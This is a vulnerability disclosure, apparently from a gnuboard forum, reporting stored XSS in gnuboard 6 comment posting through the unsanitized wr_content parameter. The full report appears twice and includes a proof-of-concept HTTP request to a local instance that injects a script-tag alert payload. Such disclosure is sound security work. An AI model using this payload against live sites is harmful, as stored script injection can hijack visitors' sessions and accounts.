Hello.
Currently, there is a writing vulnerability using the <script> tag when writing Gnubord g6 comments.
### [Name of affected Product]
gnuboard 6
### [Affected version]
https://github.com/gnuboard/g6/commit/58c737a263ac0c523592fd87ff71b9e3c07d7cf5
### [Vulnerability Type]
* Stored XSS
### [Root Cause]
* While writing reply on a post, `wr_content` parameter is not sanitized html tags, so when posting reply with a HTML tag caused Stored XSS attack.
### [Attack Vectors]
https://github.com/gnuboard/g6/assets/25397908/1165cc3e-b16a-402f-8438-731aa686d187
As shown above, it is normally prohibited to enter HTML tags within a web browser, but if you manipulate HTTP requests using proxy tools such as Burp Suite or send web requests directly to the requests library to create comments, the HTML tags are reflected as they are.
This enables Stored XSS attacks by injecting the tag `<script>`.
The bottom is a PoC Web request.
```
POST /board/write_comment_update/free HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 120
Cache-Control: max-age=0
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8000/board/free/9
Accept-Encoding: gzip, deflate, br
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ck_visit_ip=127.0.0.1; session=eyJpc19tb2JpbGUiOiBmYWxzZSwgInNzX3Rva2VuIjogImNhYjNmNTJlMWJiMGM4MTI5YjJkZWFhOThjNzU1NzNiIiwgInNzX3dyaXRlX3RpbWUiOiAiMjAyNC0wMS0xNyAxNzoyOToxMyIsICJzc19tYl9pZCI6ICJhZG1pbiIsICJzc19tYl9rZXkiOiAiYjQ1NDlkNDUyY2I5OGE4ZTQ0NjgxMjRlMDljN2U2ZDIifQ==.Zahxzw.f63f-VyyFl0nkkcr7ZReYkGnMm4
Connection: close
w=c&bo_table=free&wr_id=9&comment_id=&sca=&sfl=&stx=&spt=&page=&token=cab3f52e1bb0c8129b2deaa98c75573b&wr_content=<script>alert(1)</script>
```
Currently, there is a writing vulnerability using the <script> tag when writing Gnubord g6 comments.
### [Name of affected Product]
gnuboard 6
### [Affected version]
https://github.com/gnuboard/g6/commit/58c737a263ac0c523592fd87ff71b9e3c07d7cf5
### [Vulnerability Type]
* Stored XSS
### [Root Cause]
* While writing reply on a post, `wr_content` parameter is not sanitized html tags, so when posting reply with a HTML tag caused Stored XSS attack.
### [Attack Vectors]
https://github.com/gnuboard/g6/assets/25397908/1165cc3e-b16a-402f-8438-731aa686d187
As shown above, it is normally prohibited to enter HTML tags within a web browser, but if you manipulate HTTP requests using proxy tools such as Burp Suite or send web requests directly to the requests library to create comments, the HTML tags are reflected as they are.
This enables Stored XSS attacks by injecting the tag `<script>`.
The bottom is a PoC Web request.
```
POST /board/write_comment_update/free HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 120
Cache-Control: max-age=0
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8000/board/free/9
Accept-Encoding: gzip, deflate, br
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ck_visit_ip=127.0.0.1; session=eyJpc19tb2JpbGUiOiBmYWxzZSwgInNzX3Rva2VuIjogImNhYjNmNTJlMWJiMGM4MTI5YjJkZWFhOThjNzU1NzNiIiwgInNzX3dyaXRlX3RpbWUiOiAiMjAyNC0wMS0xNyAxNzoyOToxMyIsICJzc19tYl9pZCI6ICJhZG1pbiIsICJzc19tYl9rZXkiOiAiYjQ1NDlkNDUyY2I5OGE4ZTQ0NjgxMjRlMDljN2U2ZDIifQ==.Zahxzw.f63f-VyyFl0nkkcr7ZReYkGnMm4
Connection: close
w=c&bo_table=free&wr_id=9&comment_id=&sca=&sfl=&stx=&spt=&page=&token=cab3f52e1bb0c8129b2deaa98c75573b&wr_content=<script>alert(1)</script>
```
|
댓글을 작성하시려면 로그인이 필요합니다.
댓글 1개